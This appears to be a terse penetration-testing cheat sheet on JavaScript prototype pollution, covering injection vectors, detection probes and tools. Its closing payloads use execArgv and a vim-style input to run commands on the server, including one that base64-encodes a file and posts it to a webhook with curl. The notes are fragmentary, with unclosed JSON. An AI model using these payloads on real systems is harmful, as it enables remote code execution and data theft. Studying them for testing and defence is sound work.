Prototype Pollution

Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects. name.__proto__ , name['__proto__'] , name.constructor.prototype


  • Try different ways of adding an arbitrary property to Object.prototype. Try to inject an arbitrary property via the query string, URL fragment, and any JSON input. (es. __proto__[foo]=bar -> In console

  • Identify a gadget property that allows you to execute arbitrary JavaScript.

Use DOM Invader and Server-Side Prototype Pollution Scanner.

More difficult to detect:

  • No source code access

  • Lack of developer tools

  • The DoS problem

  • Pollution persistence

POST or PUT requests that submit JSON data to an application or API are prime candidates

POST Request
POST Request


"__proto__": {
    "json spaces": 10
// raw response.
"__proto__": {
    "status": 412
// then trigger an error response with json body.


For identifying

"__proto__": {

For exploit

    "execArgv": [
        "--eval=require('child_process').execSync('curl webhook')"
// find functionality that may spawn node child processes.


    "input":":! <command>\n"
    // ex. -> ! cat /file | base64 | curl -d @- https://webhook\n"
// find functionality that may spawn node child processes.

Last updated